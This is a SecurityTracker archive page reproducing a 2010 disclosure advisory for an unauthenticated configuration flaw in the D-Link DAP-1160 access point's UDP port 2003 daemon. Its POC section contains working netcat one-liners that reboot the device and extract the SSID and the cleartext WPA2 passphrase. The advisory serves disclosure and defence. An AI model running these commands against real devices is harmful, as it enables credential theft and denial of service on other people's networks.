SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   D-Link Router Vendors:   D-Link Systems, Inc.
D-Link DAP-1160 Router Lets Remote Users Modify the Configuration
SecurityTracker Alert ID:  1024156
SecurityTracker URL:  http://securitytracker.com/id/1024156
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 28 2010
Impact:   Denial of service via network, Disclosure of authentication information, Disclosure of system information, Modification of authentication information, Modification of system information
Exploit Included:  Yes  
Version(s): Model DAP-1160, firmware 1.20b06, 1.30b10, 1.31b01
Description:   A vulnerability was reported in the D-Link DAP-1160 Router. A remote user can modify the configuration of the target system.

A remote user can send specially crafted UDP packets to the dccd daemon on UPD port 2003 to modify several device parameters, including the SSID, wifi keys, and passwords. A remote user can also cause the target device to reboot.

Cristofaro Mune of icysilence.org reported this vulnerability.

Impact:   A remote user can obtain and modify configuration parameters on the target system.

A remote user can cause the target device to reboot.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.dlink.com/ (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

Security Advisory

IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration



Advisory Information
--------------------
Published:
2010-06-28

Updated:
2010-06-28

Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06
          1.30b10
          1.31b01



Vulnerability Details
---------------------

Public References:
Not Assigned


Platform:
Successfully tested on D-Link DAP-1160 loaded with firmware versions:
v120b06, v130b10, v131b01.
Other models and/or firmware versions may be also affected.
Note: Only firmware version major numbers are displayed on the
administration web interface: 1.20, 1.30, 1.31


Background Information:
D-Link DAP-1160 is a wireless access points that allow wireless clients
connectivity to wired networks.
Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported.


Summary:
Unauthenticated access and modification of several device parameters,
including Wi-Fi SSID, keys and passphrases is possible.
Unauthenticated remote reboot of the device can be also performed.


Details:
DCCD is an UDP daemon that listens on port UDP 2003 of the device, that
is likely used for easy device configuration via the DCC (D-Link Click
'n Connect) protocol.
By sending properly formatted UDP datagrams to dccd daemon it is
possible to perform security relevant operation without any previous
authentication.
It is possible to remotely retrieve sensitive wireless configuration
parameters, such as Wi-Fi SSID, Encryption types, keys and passphrases,
along with other additional information.
It is also possible to remotely modify such parameters and configure the
device without any knowledge of the web administration password.
Remote reboot is another operation that an attacker may perform in an
unauthenticated way, possibly triggering a Denial-of-Service condition.


POC:
- Remote reboot
python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003

- Retrieving Wi-Fi SSID
python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt
-u <IP_ADDR> 2003
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
received datagram)

- Retrieving WPA2 PSK
python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' |
nc -u -o pass.txt <IP_ADDR> 2003
cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the
received datagram)


Impacts:
Remote extraction of sensitive information
Modification of existing device configuration
POssible Denial-of-Service


Solutions & Workaround:
Not available



Additional Information
----------------------
Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional
website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
----------- No response -----------
26/05/2010: Partial disclosure at CONFidence 2010
28/06/2010: This advisory


Additional information available at http://www.icysilence.org
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC